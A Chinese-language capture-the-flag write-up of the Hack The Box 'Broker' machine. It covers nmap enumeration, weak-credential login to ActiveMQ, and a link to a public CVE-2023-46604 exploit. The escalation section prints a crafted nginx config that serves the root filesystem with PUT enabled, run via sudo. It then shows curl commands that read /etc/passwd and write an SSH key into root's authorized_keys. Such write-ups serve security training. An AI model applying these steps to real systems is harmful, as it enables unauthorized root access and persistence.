HTB-Broker

1 Information

1.1 nmap

┌──(kali㉿kali)-[~]                                                                                                                                                      
└─$ nmap -p- --min-rate 10000 10.10.11.243                                                                                                                               
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-13 02:32 EST                                                                                                          
Warning: 10.10.11.243 giving up on port because retransmission cap hit (10).        
Nmap scan report for 10.10.11.243                                                   
Host is up (0.22s latency).                                                         
Not shown: 63029 closed tcp ports (conn-refused), 2497 filtered tcp ports (no-response)
PORT      STATE SERVICE                                                             
22/tcp    open  ssh                                                                 
80/tcp    open  http                                                                
1883/tcp  open  mqtt                                                                
5672/tcp  open  amqp                                                                
8161/tcp  open  patrol-snmp                                                         
37733/tcp open  unknown                                                                                                                                                  
61613/tcp open  unknown                                                             
61614/tcp open  unknown                                                             
61616/tcp open  unknown                                                             
                                                                                    
Nmap done: 1 IP address (1 host up) scanned in 104.81 seconds    

┌──(kali㉿kali)-[~]                                                                                                                                                      
└─$ nmap -sC -sV -p 22,80,1883,5672,8161,37733,61613,61614,61616 10.10.11.243                                                                                            
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-13 02:35 EST                                                                                                          
Nmap scan report for 10.10.11.243                                                   
Host is up (0.22s latency).                                                         
                                                                                    
PORT      STATE SERVICE    VERSION                                                  
22/tcp    open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp    open  http       nginx 1.18.0 (Ubuntu)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
1883/tcp  open  mqtt
|_mqtt-subscribe: Failed to receive control packet from server.
5672/tcp  open  amqp?
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     AMQP
|     AMQP
|     amqp:decode-error
|_    7Connection from client using unsupported AMQP attempted
8161/tcp  open  http       Jetty 9.4.39.v20210325
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-title: Error 401 Unauthorized
|_http-server-header: Jetty(9.4.39.v20210325)
37733/tcp open  tcpwrapped
61613/tcp open  stomp      Apache ActiveMQ 
| fingerprint-strings: 
|   HELP4STOMP: 
|     ERROR
|     content-type:text/plain
|     message:Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
|     org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
|     org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
|     org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
|     org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_    java.lang.Thread.run(Thread.java:750)
61614/tcp open  http       Jetty 9.4.39.v20210325
|_http-title: Site doesn't have a title.
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Jetty(9.4.39.v20210325)
61616/tcp open  apachemq   ActiveMQ OpenWire transport
| fingerprint-strings: 
|   NULL: 
|     ActiveMQ
|     TcpNoDelayEnabled
|     SizePrefixDisabled
|     CacheSize
|     ProviderName 
|     ActiveMQ
|     StackTraceEnabled
|     PlatformDetails 
|     Java
|     CacheEnabled
|     TightEncodingEnabled
|     MaxFrameSize
|     MaxInactivityDuration
|     MaxInactivityDurationInitalDelay
|     ProviderVersion 
|_    5.15.15
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-serv
ice :
......
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.71 seconds

8161：ActiveMQ前台端口号，提供管理控制服务
61616：ActiveMQ默认后台端口号，提供JMS服务（JAVA消息服务）

1.2 WEB

访问80端口

使用弱口令admin:admin登录

通过“Manage ActiveMQ broker”跳转至/admin,获得如下消息

2 WEB Shell

ActiveMQ 存在一个新的 CVE-2023-46604，是一个不需要认证的远程代码执行漏洞。

POC : https://github.com/evkl1d/CVE-2023-46604

根据POC的README可以轻松获得broker的webshell

3 Privilege

3.1 sudo 提权

提权先查看是否可执行sudo

activemq@broker:/opt/apache-activemq-5.15.15/bin$ sudo -l
sudo -l
Matching Defaults entries for activemq on broker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User activemq may run the following commands on broker:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx
activemq@broker:/opt/apache-activemq-5.15.15/bin$

可以在启动一个恶意的nginx服务，将目录执行为根目录，甚至可以允许PUT请求

user root;
events {
    worker_connections 1024;
}
http {
    server {
        listen 1337;
        root /;
        autoindex on;
        dav_methods PUT;
    }
}
 nginx的配置文件

编辑好nginx的配置文件后，将其上传至目标机器

使用sudo nginx开启恶意服务

1 2	activemq@broker:~$ sudo /usr/sbin/nginx -c /home/activemq/nginx.conf sudo /usr/sbin/nginx -c /home/activemq/nginx.conf

使用curl nginx服务进行本地文件读取

activemq@broker:~$ curl http://127.0.0.1:1337/etc/passwd          
curl http://127.0.0.1:1337/etc/passwd                                               
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1880  100  1880    0     0  1599k      0 --:--:-- --:--:-- --:--:-- 1835k
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
......

3.2 SSH登录

本地生成ssh秘钥

将公钥写入目标机器

1
2

activemq@broker:~$ curl -X PUT http://127.0.0.1:1337/root/.ssh/authorized_keys -d "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCONGEADNHteG1ndR7ctkZSxs7m/PNLsCBxJRozCU0AiAdiuWl/YTIqZMvIg/e9o5ftye0Wu46T91n1I30mzPiR2Lg7AVmxP7ngv2v3Crb3x/fl6sPwhBDKtFCZQnu......."

SSH连接